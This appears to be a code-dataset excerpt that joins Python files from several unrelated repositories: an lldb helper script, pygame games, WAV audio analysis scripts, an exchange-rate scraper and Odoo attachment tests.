:return: The extracted text separated into pages.
:rtype: list[str]
"""
return [page.extract_text() for page in pdfplumber.open(file_path_or_stream).pages]
# XXX: Hacky
def preprocess_text(text: str) -> str:
"""Preprocesses text (tries to remove useless text).
:param text: The text to preprocess.
:type text: str
:return: The preprocessed text.
:rtype: str
"""
response_text: str = ""
for line in text.split("\n"):
all_words = word_tokenize(line)
has_stop_word = False
for word in all_words:
if word.lower() in stop_words:
has_stop_word = True
break
acceptable_word = has_stop_word
if any(c not in string.printable for c in line):
acceptable_word = False
if title_expression.match(line):
acceptable_word = True
if "[" in line.split(" ")[0] and "]" in line.split(" ")[0]:
acceptable_word = True
if line.count(" ") > len(line) / 5:
acceptable_word = False
if acceptable_word:
response_text += line + "\n"
return response_text
``` |
{
"source": "000james000/swift",
"score": 2
} |
#### File: utils/lldb/lldbToolBox.py
```python
import argparse
import os
import shlex
import subprocess
import sys
import tempfile
import lldb
REPO_BASE = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,
os.pardir, os.pardir))
SWIFT_REPO = os.path.join(REPO_BASE, "swift")
LLVM_REPO = os.path.join(REPO_BASE, "llvm")
LLVM_DATAFORMATTER_PATH = os.path.join(LLVM_REPO, "utils",
"lldbDataFormatters.py")
SWIFT_DATAFORMATTER_PATH = os.path.join(SWIFT_REPO, "utils",
"lldb", "lldbSwiftDataFormatters.py")
def import_llvm_dataformatters(debugger):
if not os.access(LLVM_DATAFORMATTER_PATH, os.F_OK):
print("WARNING! Could not find LLVM data formatters!")
return
cmd = 'command script import {}'.format(LLVM_DATAFORMATTER_PATH)
debugger.HandleCommand(cmd)
print("Loaded LLVM data formatters.")
def import_swift_dataformatters(debugger):
if not os.access(SWIFT_DATAFORMATTER_PATH, os.F_OK):
print("WARNING! Could not find Swift data formatters!")
return
cmd = 'command script import {}'.format(SWIFT_DATAFORMATTER_PATH)
debugger.HandleCommand(cmd)
print("Loaded Swift data formatters.")
VIEWCFG_PATH = os.path.join(SWIFT_REPO, "utils", "viewcfg")
BLOCKIFYASM_PATH = os.path.join(SWIFT_REPO, "utils", "dev-scripts",
"blockifyasm")
def disassemble_asm_cfg(debugger, command, exec_ctx, result, internal_dict):
"""
This function disassembles the current assembly frame into a temporary file
and then uses that temporary file as input to blockifyasm | viewcfg. This
will cause a pdf of the cfg to be opened on Darwin.
"""
d = exec_ctx.frame.Disassemble()
with tempfile.TemporaryFile() as f:
f.write(bytes(d, 'utf-8'))
f.flush()
f.seek(0)
p1 = subprocess.Popen([BLOCKIFYASM_PATH], stdin=f,
stdout=subprocess.PIPE)
subprocess.Popen([VIEWCFG_PATH], stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
def disassemble_to_file(debugger, command, exec_ctx, result, internal_dict):
"""This function disassembles the current assembly frame into a file specified
by the user.
"""
parser = argparse.ArgumentParser(prog='disassemble-to-file', description="""
Dump the disassembly of the current frame to the specified file.
""")
parser.add_argument('file', type=argparse.FileType('w'),
default=sys.stdout)
args = parser.parse_args(shlex.split(command))
args.file.write(exec_ctx.frame.disassembly)
def sequence(debugger, command, exec_ctx, result, internal_dict):
"""
Combine multiple semicolon separated lldb commands into one command.
This command is particularly useful for defining aliases and breakpoint
commands. Some examples:
# Define an alias that prints rax and also steps one instruction.
command alias xs sequence p/x $rax; stepi
# Breakpoint command to show the frame's info and arguments.
breakpoint command add -o 'seq frame info; reg read arg1 arg2 arg3'
# Override `b` to allow a condition to be specified. For example:
# b someMethod if someVar > 2
command regex b
s/(.+) if (.+)/seq _regexp-break %1; break mod -c "%2"/
s/(.*)/_regexp-break %1/
"""
interpreter = debugger.GetCommandInterpreter()
for subcommand in command.split(';'):
subcommand = subcommand.strip()
if not subcommand:
continue # skip empty commands
ret = lldb.SBCommandReturnObject()
interpreter.HandleCommand(subcommand, exec_ctx, ret)
if ret.GetOutput():
print >>result, ret.GetOutput().strip()
if not ret.Succeeded():
result.SetError(ret.GetError())
result.SetStatus(ret.GetStatus())
return
def __lldb_init_module(debugger, internal_dict):
import_llvm_dataformatters(debugger)
import_swift_dataformatters(debugger)
debugger.HandleCommand('command script add disassemble-asm-cfg '
'-f lldbToolBox.disassemble_asm_cfg')
debugger.HandleCommand('command script add disassemble-to-file '
'-f lldbToolBox.disassemble_to_file')
debugger.HandleCommand('command script add sequence '
'-h "Run multiple semicolon separated commands" '
'-f lldbToolBox.sequence')
``` |
{
"source": "000Nobody/2D-Minecraft",
"score": 3
} |
#### File: scripts/classes/player.py
```python
import pygame
import os
from ..core_functions import move, distance
from ...variables import *
class Player:
def __init__(self, start_pos, width, height, vel, jump_height, reach_distance=4):
self.width = width
self.height = height
self.vel = vel
self.jump_height = jump_height
self.reach_distance = reach_distance
self.rect = pygame.Rect(start_pos[0], start_pos[1], width, height)
self.coords = (self.rect.x//TILE_SIZE, self.rect.y//TILE_SIZE)
self.pixel_coords = (self.coords[0] * TILE_SIZE, self.coords[1] * TILE_SIZE)
self.jumping = False
self.moving_right = False
self.moving_left = False
self.movement = [0, 0]
self.selected_block = None
self.current_chunk = (0, 0)
self.inventory = []
self.current_animation = 'idle'
self.animations = self.load_animations('data/imgs/player')
self.animation_counter = 0
self.animation_flip = False
def move(self, tile_rects):
self.rect, self.collision_types, self.hit_list = move(self.rect, tile_rects, self.movement)
if self.collision_types['bottom'] and not self.jumping:
self.movement[1] = 1
if not self.collision_types['bottom']:
self.jumping = False
self.movement[1] += GRAVITY_STRENGTH
if self.collision_types['top']:
self.movement[1] = 1
if self.moving_right:
self.movement[0] = self.vel
self.current_animation = 'walk'
self.animation_flip = False
if self.moving_left:
self.movement[0] = -self.vel
self.current_animation = 'walk'
self.animation_flip = True
if self.jumping and self.collision_types['bottom']:
self.movement[1] = -self.jump_height
self.jumping = False
if not self.moving_left and not self.moving_right:
self.movement[0] = 0
self.current_animation = 'idle'
if self.movement[1] > 30:
self.movement[1] = 30
def get_selected_block(self, terrain, mx, my):
mx += scroll[0]
my += scroll[1]
selected_coords = (mx//TILE_SIZE, my//TILE_SIZE)
for block in terrain.map:
if selected_coords == block.coords:
if distance(selected_coords, self.coords) <= self.reach_distance:
if not block.rect.colliderect(self.rect):
self.selected_block = block
else:
self.selected_block = None
else:
self.selected_block = None
def break_block(self, terrain, hotbar):
self.current_animation = 'break'
if self.selected_block and self.selected_block.type != 'air':
self.inventory.append(self.selected_block.type)
hotbar.add_block_to_slot(self.selected_block.type, 1)
terrain.remove_block(self.selected_block.pos)
def place_block(self, terrain, hotbar):
self.current_animation = 'place'
if (self.selected_block and self.selected_block.type == 'air'):
if hotbar.selected_slot_content != []:
if hotbar.selected_slot_content[1] > 0:
if terrain.add_block(self.selected_block.pos, hotbar.selected_slot_content[0]):
hotbar.slot_contents[hotbar.selected_slot][1] -= 1
def load_animations(self, dir):
animation_dict = {}
for animation in os.listdir(dir):
frame_list = []
for frame in os.listdir(dir + '/' + animation):
img = pygame.image.load(dir+'/'+animation+'/'+frame).convert_alpha()
img = pygame.transform.scale(img, (TILE_SIZE*2-10, TILE_SIZE*2-10))
frame_list.append(img)
animation_dict[animation] = frame_list
return animation_dict
def draw(self, display):
# temp_rect = pygame.Rect(self.rect.x - scroll[0], self.rect.y - scroll[1], self.width, self.height)
# pygame.draw.rect(display, 'white', temp_rect)
if self.animation_counter//7 < len(self.animations[self.current_animation]):
current_img = self.animations[self.current_animation][self.animation_counter//7]
else:
self.animation_counter = 0
current_img = self.animations[self.current_animation][self.animation_counter//7]
self.animation_counter += 1
if self.animation_flip:
current_img = pygame.transform.flip(current_img, True, False)
scrolled_pos = (self.rect.x - scroll[0]-30, self.rect.y - scroll[1]+3)
display.blit(current_img, scrolled_pos)
if self.selected_block:
block_rect = pygame.Rect(
self.selected_block.x - scroll[0],
self.selected_block.y - scroll[1],
TILE_SIZE,
TILE_SIZE
)
pygame.draw.rect(display, 'black', block_rect, 3)
def update(self, terrain):
self.move(terrain.tile_rects)
self.coords = (self.rect.x//TILE_SIZE, self.rect.y//TILE_SIZE)
self.pixel_coords = (self.coords[0] * TILE_SIZE, self.coords[1] * TILE_SIZE)
for block in terrain.map:
if self.coords == block.coords:
self.current_chunk = block.chunk
```
#### File: data/scripts/core_functions.py
```python
import pygame
import math
def draw(display, *classes):
display.fill((227, 247, 255))
for item in classes:
if isinstance(item, list):
for i in item:
i.draw(display)
else:
item.draw(display)
pygame.display.update()
def move(rect, tiles, movement):
collision_types = {'top':False,'bottom':False,'right':False,'left':False}
rect.x += movement[0]
hit_list = collision_check(rect, tiles)
for tile in hit_list:
if movement[0] > 0:
rect.right = tile.left
collision_types['right'] = True
elif movement[0] < 0:
rect.left = tile.right
collision_types['left'] = True
rect.y += movement[1]
hit_list = collision_check(rect, tiles)
for tile in hit_list:
if movement[1] > 0:
rect.bottom = tile.top
collision_types['bottom'] = True
elif movement[1] < 0:
rect.top = tile.bottom
collision_types['top'] = True
return rect, collision_types, hit_list
def collision_check(rect, tiles):
hit_list = []
for tile in tiles:
if tile not in hit_list:
if rect.colliderect(tile):
hit_list.append(tile)
return hit_list
def distance(pos1, pos2):
x = (pos2[0] - pos1[0])**2
y = (pos2[1] - pos1[1])**2
return math.sqrt(x + y)
def draw_rect_alpha(display, color, rect):
shape_surf = pygame.Surface(pygame.Rect(rect).size, pygame.SRCALPHA)
pygame.draw.rect(shape_surf, color, shape_surf.get_rect())
display.blit(shape_surf, rect)
``` |
{
"source": "000Nobody/Conways-Game-Of-Life",
"score": 3
} |
#### File: 000Nobody/Conways-Game-Of-Life/main.py
```python
import sys
import pygame
from pygame.locals import *
run = __name__ == '__main__'
clock = pygame.time.Clock()
#-----Options------
WINDOW_SIZE = (1920, 1080) # (width, height) in pixels
CELL_SIZE = 10 # in pixels
FPS = 15 # number of generations per second
#------------------
screen = pygame.display.set_mode(WINDOW_SIZE)
display = pygame.Surface(WINDOW_SIZE)
cells = []
setting_up = True
lmousedown = False
rmousedown = False
show_grid = False
columns = WINDOW_SIZE[0] // CELL_SIZE
rows = WINDOW_SIZE[1] // CELL_SIZE
play_button_img = pygame.image.load('images/play_button.png').convert_alpha()
pause_button_img = pygame.image.load('images/pause_button.png').convert_alpha()
class Cell():
def __init__(self, x, y, size):
self.x = x
self.y = y
self.size = size
self.living = False
self.x_coord = self.x // size
self.y_coord = self.y // size
self.rect = pygame.Rect(x, y, size, size)
def getNeighbors(self, cells):
# Translates the cells position in the 2d array in
# 8 directions to find the neighboring cells
neighbors = []
translate_directions = [
[0, 1],
[1, 0],
[0,-1],
[-1,0],
[1,-1],
[-1,1],
[1, 1],
[-1,-1],
]
for translation in translate_directions:
x = self.x_coord + translation[0]
y = self.y_coord + translation[1]
# check if neighbor exists
if x < 0 or y < 0 or x >= len(cells[0]) or y >= len(cells):
continue
neighbors.append(cells[y][x])
return neighbors
def update(self):
living_neigbhors = 0
for neighbor in self.neighbors:
if neighbor.living:
living_neigbhors += 1
if self.living:
if living_neigbhors < 2:
self.lives_next_round = False
elif living_neigbhors > 3:
self.lives_next_round = False
else:
self.lives_next_round = True
else:
if living_neigbhors == 3:
self.lives_next_round = True
else:
self.lives_next_round = False
# Setting self.lives_next_round instead of self.living so that all cells can update their state at the same time
def draw(self, display):
if self.living:
pygame.draw.rect(display, (255, 255, 255), self.rect)
else:
if show_grid:
pygame.draw.rect(display, (150, 150, 150), self.rect, 1)
# Creating cells and storing them in a 2d array
for i in range(rows):
cells.append([Cell(j*CELL_SIZE, i*CELL_SIZE, CELL_SIZE) for j in range(columns)])
# Once all cells are created, find all of their neighbors
for row in cells:
for cell in row:
cell.neighbors = cell.getNeighbors(cells)
def draw():
display.fill((50, 50, 50))
for row in cells:
for cell in row:
cell.draw(display)
if setting_up:
display.blit(pause_button_img, (0, WINDOW_SIZE[1]-70))
else:
display.blit(play_button_img, (0, WINDOW_SIZE[1]-70))
screen.blit(display, (0, 0))
pygame.display.update()
while run:
if not setting_up:
clock.tick(FPS)
mx, my = pygame.mouse.get_pos()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_g:
show_grid = not show_grid
if setting_up:
if event.type == MOUSEBUTTONDOWN:
if event.button == 1:
lmousedown = True
if event.button == 3:
rmousedown = True
if event.type == MOUSEBUTTONUP:
if event.button == 1:
lmousedown = False
if event.button == 3:
rmousedown = False
if event.type == KEYDOWN:
if event.key == K_SPACE:
setting_up = False
if event.key == K_c:
for row in cells:
for cell in row:
cell.living = False
if lmousedown:
try:
cells[my//CELL_SIZE][mx//CELL_SIZE].living = True
except IndexError:
pass
if rmousedown:
try:
cells[my//CELL_SIZE][mx//CELL_SIZE].living = False
except IndexError:
pass
else:
if event.type == KEYDOWN:
if event.key == K_SPACE:
setting_up = True
if not setting_up:
for row in cells:
for cell in row:
cell.update()
for row in cells:
for cell in row:
cell.living = cell.lives_next_round
draw()
``` |
{
"source": "000ubird/HighResolution",
"score": 3
} |
#### File: libs/audio/read.py
```python
import wave
import numpy
#ファイル名を指定し、wavファイルのサンプリング周波数とint型のデータを連想配列で返す
def read_wav_cd(fileName) :
print("Reading "+fileName)
#指定したファイルが見つからなかった時の処理
try :
wf = wave.open(fileName, "r")
except FileNotFoundError :
print ("ファイル "+fileName+" が見つかりません")
exit()
fs = wf.getframerate() #サンプリング周波数
N = wf.getnframes() #フレーム数
data = wf.readframes(wf.getnframes())
#int型に変換
data = numpy.frombuffer(data, dtype="int16") / 32768.0
wf.close()
return {"data":data, "fs":fs, "N":N}
```
#### File: libs/other/wav_lib_sample_007.py
```python
import struct
import wave
import numpy as np
import scipy.signal
from pylab import *
"""SciPyのFIRフィルタ関数を使うサンプル"""
def fft(b, y, fs):
"""フィルタ係数bとフィルタされた信号yのFFTを求める"""
b = list(b)
y = list(y)
N = 512 # FFTのサンプル数
# 最低でもN点ないとFFTできないので0.0を追加
for i in range(N):
b.append(0.0)
y.append(0.0)
# フィルタ係数のFFT
B = np.fft.fft(b[0:N])
freqList = np.fft.fftfreq(N, d=1.0/fs)
spectrum = [int(np.sqrt(c.real ** 2 + c.imag ** 2)) for c in B]
# フィルタ係数の波形領域
subplot(221)
plot(range(0, N), b[0:N])
axis([0, N, -0.5, 0.5])
xlabel("time [sample]")
ylabel("amplitude")
# フィルタ係数の周波数領域
subplot(223)
n = len(freqList) / 2
plot(freqList[:n], spectrum[:n], linestyle='-')
axis([0, fs/2, 0, 1.2])
xlabel("frequency [Hz]")
ylabel("spectrum")
# フィルタされた波形のFFT
Y = np.fft.fft(y[0:N])
freqList = int(np.fft.fftfreq(N, d=1.0/fs))
spectrum = [int(np.sqrt(c.real ** 2 + c.imag ** 2)) for c in Y]
print(freqList)
# 波形を描画
subplot(222)
plot(range(0, N), y[0:N])
axis([0, N, -1.0, 1.0])
xlabel("time [sample]")
ylabel("amplitude")
# 振幅スペクトルを描画
subplot(224)
n = len(freqList) / 2
plot(freqList[:n], spectrum[:n], linestyle='-')
axis([0, fs/2, 0, 10])
xlabel("frequency [Hz]")
ylabel("spectrum")
show()
def save(data, fs, bit, filename):
"""波形データをWAVEファイルへ出力"""
wf = wave.open(filename, "w")
wf.setnchannels(2)
wf.setsampwidth(2)
wf.setframerate(41000)
wf.writeframes(data)
wf.close()
if __name__ == '__main__':
wf = wave.open("sample.wav", "r")
fs = wf.getframerate()
x = wf.readframes(wf.getnframes())
x = frombuffer(x, dtype="int16") / 32768.0
nyq = fs / 2.0 # ナイキスト周波数
# フィルタの設計
# ナイキスト周波数が1になるように正規化
fe1 = 50.0 / nyq # カットオフ周波数1
fe2 = 3000.0 / nyq # カットオフ周波数2
numtaps = 255 # フィルタ係数(タップ)の数(要奇数)
b = scipy.signal.firwin(numtaps, fe1) # Low-pass
#b = scipy.signal.firwin(numtaps, fe2, pass_zero=False) # High-pass
# b = scipy.signal.firwin(numtaps, [fe1, fe2], pass_zero=False) # Band-pass
# b = scipy.signal.firwin(numtaps, [fe1, fe2]) # Band-stop
# FIRフィルタをかける
y = scipy.signal.lfilter(b, 1, x)
# フィルタ係数とフィルタされた信号のFFTを見る
fft(b, y, fs)
# 音声バイナリに戻して保存
y = [int(v * 32767.0) for v in y]
y = struct.pack("h" * len(y), *y)
save(y, fs, 16, "sine2.wav")
```
#### File: HighResolution/src/makeAmpCSV.py
```python
import numpy as np
import audioread as ar
import math
import sys, time
#ファイル名
wavName_hi = "../wav/02-Are You Real.wav"
wavName_cd = "../wav/02-Are You Real_CD.wav"
csvName_hi = "../result_hi.csv"
csvName_cd = "../result_cd.csv"
#取得する振幅値の数
N = 20
#参考: http://wrist.hatenablog.com/entry/2013/08/06/015240
def pcm2float(short_ndary):
float_ndary = np.array(short_ndary, dtype=np.float64)
return np.where(float_ndary > 0.0, float_ndary / 32767.0, float_ndary / 32768.0)
#ファイル名を指定し、wavファイルのサンプリング周波数と振幅値を連想配列で返す
def read_wav_cd(wavName,begin,end) :
wav_bary = bytearray()
with ar.audio_open(wavName) as f:
if f.duration*f.samplerate < end-begin:
print("サンプル数が音声信号の長さを超えています。")
exit()
print("ファイル名 : ",wavName,"\nチャネル数: {0}[channel] \nサンプリング周波数 : {1}[Hz]\nフレーム数 : {2}"
.format(f.channels, f.samplerate, f.duration*f.samplerate))
# "block_samples"で指定されたチャンクサイズずつ処理する(デフォルト1024)
for buf in f:
wav_bary.extend(buf)
wav_ary = np.frombuffer(wav_bary, dtype=np.int16) # 常時16bitで読み込まれる
wav_l = wav_ary[0::2]
wav_r = wav_ary[1::2]
#print(wav_l.shape)
#print(wav_r.shape)
# shortをfloat64に変換
wav_float_l = pcm2float(wav_l[begin:end]) #配列が大きいとメモリエラー
wav_float_r = pcm2float(wav_r[begin:end])
#読み込んだ波形の一部を描画
#import pylab as pl
#pl.plot(wav_float_l[begin:end])
#pl.show()
return {"amp_l":wav_float_l, "amp_r":wav_float_r}
#指定したフレーム数分だけ振幅値をCSVで出力する
def makeAmpCSV(wavData,csvName,begin,end):
amps = [[]] #2次元配列の動的確保
result = ""
#指定したフレーム部分内の振幅値を取得
i = begin
while i < end :
#numAmp分だけ振幅値を抽出
for j in range(i,i+N) :
amps.append(wavData[j])
#最後の列にはカンマを付けない
if j == i+N-1 :
result += repr(wavData[j])
else :
result += repr(wavData[j])+','
result += '\n'
i += N
#CSVファイルに格納
try :
f = open(csvName,'w')
f.write(result)
f.close()
except :
print("CSVファイルの出力中にエラーが発生しました。")
exit()
return amps
#指定したフレーム数分だけ振幅値をCSVで出力する - CD用
def makeAmpCSV2(wavData,csvName,begin,end):
result = ""
#指定したフレーム部分内の振幅値を取得
i = begin
while i < end :
#numAmp分だけ振幅値を抽出
for j in range(i,i+N,2) :
result += repr(wavData[j])+','
result += repr(wavData[j])
#最後の列にはカンマを付けない
if j != i+N-2 :
result += ','
result += '\n'
i += N
#CSVファイルに格納
try :
f = open(csvName,'w')
f.write(result)
f.close()
except :
print("CSVファイルの出力中にエラーが発生しました。")
exit()
def makeAmpArrayHi(wavData,begin,end) :
#numpyのinsert用ダミーデータ
dummy_data = np.zeros(N)
array = np.array([dummy_data],dtype=float)
tmp_array = np.array([],dtype=float)
#指定したフレーム部分内の振幅値を取得
i = 1 #処理する先頭のフレーム数
n = 1 #結果を保持する配列のインデックス
m = 0 #N個分の振幅値を保持する配列のインデックス
current = 0
while i < end - N :
#N個分の配列データを抽出
for j in range(i,i+N) :
tmp_array = np.insert(tmp_array, m, wavData[j])
m += 1
#抽出したデータを追加
array = np.insert(array,n,tmp_array,axis=0)
#各変数の初期化
tmp_array = np.array([],dtype=float)
i += N
n += 1
m = 0
#進行度合いの表示
nextP = math.floor(i/end*100)
if nextP > current :
sys.stdout.write("\r%s" % str(nextP)+"% ")
sys.stdout.flush()
time.sleep(0.01)
current = nextP
sys.stdout.write("\r%s" % str(100)+"% ")
print("\n作成完了\n")
return array
def makeAmpArrayCD(wavData,begin,end) :
#numpyのinsert用ダミーデータ
dummy_data = np.zeros(N)
array = np.array([dummy_data],dtype=float)
tmp_array = np.array([],dtype=float)
#指定したフレーム部分内の振幅値を取得
i = 1 #処理する先頭のフレーム数
n = 1 #結果を保持する配列のインデックス
m = 0 #N個分の振幅値を保持する配列のインデックス
current = 0
while i < end - N :
#N個分の配列データを抽出
for j in range(i,i+N,2) :
tmp_array = np.insert(tmp_array, m, wavData[j])
m += 1
tmp_array = np.insert(tmp_array, m, wavData[j])
m += 1
#抽出したデータを追加
array = np.insert(array,n,tmp_array,axis=0)
#各変数の初期化
tmp_array = np.array([],dtype=float)
i += N
n += 1
m = 0
#進行度合いの表示
nextP = math.floor(i/end*100)
if nextP > current :
sys.stdout.write("\r%s" % str(nextP)+"% ")
sys.stdout.flush()
time.sleep(0.01)
current = nextP
sys.stdout.write("\r%s" % str(100)+"% ")
print("\n作成完了\n")
return array
if __name__ == '__main__':
#抽出するフレーム数
beginFlame = 0 #固定
endFlame = 1000000 #10000000
#WAVデータの読み込み
wav_data_hi = read_wav_cd(wavName_hi,beginFlame,endFlame)
#wav_data_cd = read_wav_cd(wavName_cd)
a = makeAmpArrayHi(wav_data_hi['amp_l'], beginFlame, endFlame)
b = makeAmpArrayCD(wav_data_hi['amp_l'], beginFlame, endFlame)
#CSVファイルの出力
#makeAmpCSV(wav_data_hi['amp_l'], csvName_hi,beginFlame,endFlame)
#現時点ではハイレゾ音源から擬似CD音源の特徴ベクトルを作成する
#makeAmpCSV2(wav_data_hi['amp_l'], csvName_cd,beginFlame,endFlame)
#print("CSVファイルを出力しました。")
```
#### File: src/samples/gmm_test.py
```python
import numpy as np
import matplotlib.pyplot as plt
def scale(X):
"""データ行列Xを属性ごとに標準化したデータを返す"""
# 属性の数(=列の数)
col = X.shape[1]
# 属性ごとに平均値と標準偏差を計算
mu = np.mean(X, axis=0)
sigma = np.std(X, axis=0)
# 属性ごとデータを標準化
for i in range(col):
X[:,i] = (X[:,i] - mu[i]) / sigma[i]
return X
# faithful.txtデータをロード
data = np.genfromtxt("faithful.txt")
X_train = scale(data)
N = len(X_train)
# 散布図をプロット
plt.plot(X_train[:, 0], X_train[:, 1], 'gx')
plt.xlim(-2.5, 2.5)
plt.ylim(-2.5, 2.5)
plt.grid()
plt.show()
``` |
{
"source": "0011010000110010/instant_exchange_conventor",
"score": 3
} |
#### File: 0011010000110010/instant_exchange_conventor/instant-exchange-convertor-2.1.py
```python
import re
from requests import get
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
now = datetime.now()
time = datetime.strftime(now, "\n%d-%B-%Y\t%H:%M:%S:%f\n")
types = {
"dollar": {
"name": "DOLAR",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "DOLAR(\S+)"
},
"pound": {
"name": "STERLIN/POUND",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "STERLİN(\S+)"
},
"gram_gold": {
"name": "GRAM GOLD",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "ALTIN(\S+)"
},
"euro": {
"name": "EURO",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "EURO(\S+)"
}
}
types_2 = {
"bitcoin": {
"name": "BITCOIN",
"path": "/kripto-paralar/bitcoin",
"tag": "ul",
"class": "piyasa-ozeti",
"regex": "Bitcoin\s+%\s-?[\d,]+\s+\$?([\d\.,]+)"
}
}
def exc_try():
for typ in types:
exchangeURL = "https://kur.doviz.com" + types[typ]["path"]
r = get(exchangeURL)
soup = BeautifulSoup(r.content, "html.parser")
marketSumForex = soup.find_all("div", {"class": "market-data"})
divs = soup.find_all(types[typ]["tag"], {types[typ]["class"]})
all_texts = divs[-1].text
raw_text = all_texts.replace("\n", "")
value = re.findall(types[typ]["regex"], raw_text)[0]
value_rep = value.replace(".", "").replace(",", ".")
value_last = round(float(value_rep), 2)
print(
f"{decor}\n\tCompared to {types[typ]['name']}\nThe value of it, right now: ₺ {value_last}\n\t\tYou may have {round(amount/(value_last), 4)}")
def btc_try():
# dollar
exchangeURL = "https://kur.doviz.com" + types["dollar"]["path"]
r = get(exchangeURL)
soup = BeautifulSoup(r.content, "html.parser")
marketSumForex = soup.find_all("div", {"class": "market-data"})
divs = soup.find_all(types["dollar"]["tag"], {types["dollar"]["class"]})
all_texts = divs[-1].text
raw_text = all_texts.replace("\n", "")
value = re.findall(types["dollar"]["regex"], raw_text)[0]
value_rep = value.replace(".", "").replace(",", ".")
value_last_dollar = round(float(value_rep), 2)
# bitcoin
exchangeURL = "https://kur.doviz.com" + types_2["bitcoin"]["path"]
r = get(exchangeURL)
soup = BeautifulSoup(r.content, "html.parser")
marketSumForex = soup.find_all("div", {"class": "market-data"})
divs = soup.find_all(types_2["bitcoin"]["tag"], {
types_2["bitcoin"]["class"]})
all_texts = divs[-1].text
raw_text = all_texts.replace("\n", "")
value = re.findall(types_2["bitcoin"]["regex"], raw_text)[-1]
value_rep = value.replace(".", "").replace(",", ".")
value_last_btc = round(float(value_rep), 2)
btc_try = value_last_dollar * value_last_btc
print(
f"{decor}\n\tCompared to {types_2['bitcoin']['name']}\n\t\tYou may have {round(amount/(btc_try), 8)}")
if __name__ == '__main__':
while True:
decor = ("*"*50)
msg = "Welcome to Instant Exchange Convertor".center(50, "*")
exe = input(
f"\n{decor}\n{msg}\n{decor}\nFor starting, type 's'\nFor quitting, type 'q'\nWhat\'s your choice: ")
if exe == "s" or exe == "S":
amount = round(
float(input(f"\nPlease enter an amount (TRY) to invest in: ")), 2)
print(
f"\nThe exact moment right now is; {time}\nYou have '₺ {amount}' for investing.\nAccording to the instant situation of the markets;")
exc_try()
btc_try()
sleep(60)
print("\nRestarting in 10 secs...")
sleep(10)
elif exe == "q" or exe == "Q":
print("\nProgram is shutting down... Open it again whenever you need to.")
sleep(10)
break
else:
print("Type error! Please try again with correct letter;")
exe
``` |
{
"source": "001101/misc-addons",
"score": 2
} |
#### File: ir_attachment_s3/tests/test_resized_attachments.py
```python
import logging
from odoo import api, exceptions
from odoo.tests.common import HttpCase, tagged
_logger = logging.getLogger(__name__)
@tagged("post_install", "-at_install")
class TestResizedAttachments(HttpCase):
def setUp(self):
super(TestResizedAttachments, self).setUp()
self.original_image_url = "https://upload.wikimedia.org/wikipedia/commons/1/1e/Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg"
def _get_odoo_image_url(self, model, record_id, field):
return "/web/image?model={}&id={}&field={}".format(model, record_id, field)
def test_getting_cached_images_url_instead_computing(self):
env = api.Environment(self.registry.test_cr, self.uid, {})
env["ir.config_parameter"].set_param("ir_attachment_url.storage", "s3")
if not env["ir.attachment"]._get_s3_resource():
self.skipTest("Bad S3 credidentials given")
return
product_tmpl = env["product.template"].create(
{
"name": "Test template",
# set the image so that it is not installed from the product (is the white pixel)
"image": "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=",
}
)
product_product = env["product.product"].create(
{
"name": "Test product",
"image_variant": self.original_image_url,
"product_tmpl_id": product_tmpl.id,
}
)
odoo_image_url = self._get_odoo_image_url(
"product.product", product_product.id, "image"
)
odoo_image_medium_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_medium"
)
odoo_image_small_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_small"
)
self.authenticate("demo", "demo")
redirected_image = self.url_open(odoo_image_url, timeout=30)
redirected_image_medium = self.url_open(odoo_image_medium_url, timeout=30)
redirected_image_small = self.url_open(odoo_image_small_url, timeout=30)
self.assertEqual(redirected_image.status_code, 200)
self.assertEqual(redirected_image_medium.status_code, 200)
self.assertEqual(redirected_image_small.status_code, 200)
redirected_image_url = redirected_image.url
redirected_image_medium_url = redirected_image_medium.url
redirected_image_small_url = redirected_image_small.url
# Attachments must be created during the execution of requests that are written above.
product_product_image_variant_attachment = env[
"ir.http"
]._find_field_attachment(
env, "product.product", "image_variant", product_product.id
)
product_product_image_attachment = env["ir.http"]._find_field_attachment(
env, "product.product", "image", product_product.id
)
product_product_image_medium_attachment = env["ir.http"]._find_field_attachment(
env, "product.product", "image_medium", product_product.id
)
product_product_image_small_attachment = env["ir.http"]._find_field_attachment(
env, "product.product", "image_small", product_product.id
)
a = set(
product_product_image_variant_attachment.resized_ids.mapped(
"resized_attachment_id"
)
)
b = {
product_product_image_attachment,
product_product_image_medium_attachment,
product_product_image_small_attachment,
}
self.assertFalse(a.difference(b))
self.assertTrue(product_product_image_attachment)
self.assertTrue(product_product_image_medium_attachment)
self.assertTrue(product_product_image_small_attachment)
self.assertEqual(redirected_image_url, product_product_image_attachment.url)
self.assertEqual(
redirected_image_medium_url, product_product_image_medium_attachment.url
)
self.assertEqual(
redirected_image_small_url, product_product_image_small_attachment.url
)
urls = [
self.original_image_url,
redirected_image_url,
redirected_image_medium_url,
redirected_image_small_url,
]
self.assertEqual(len(urls), len(set(urls)), "Duplicates in URLs: %s" % urls)
def test_unlink_resized_attachments_when_parent_unlink(self):
env = api.Environment(self.registry.test_cr, self.uid, {})
ir_att_model = env["ir.attachment"]
ir_att_resized_model = env["ir.attachment.resized"]
original_att = ir_att_model.create({"name": "test att"})
resized_att = ir_att_model.create({"name": "resized test att"})
ir_att_resized = ir_att_resized_model.create(
{"attachment_id": original_att.id, "resized_attachment_id": resized_att.id}
)
self.assertTrue(original_att.unlink())
with self.assertRaises(exceptions.MissingError):
original_att.write({"name": "foo"})
with self.assertRaises(exceptions.MissingError):
ir_att_resized.write({"width": 1})
with self.assertRaises(exceptions.MissingError):
resized_att.write({"name": "bar"})
```
#### File: ir_attachment_url/tests/test_data_get.py
```python
import logging
from odoo.tests.common import HttpCase, tagged
_logger = logging.getLogger(__name__)
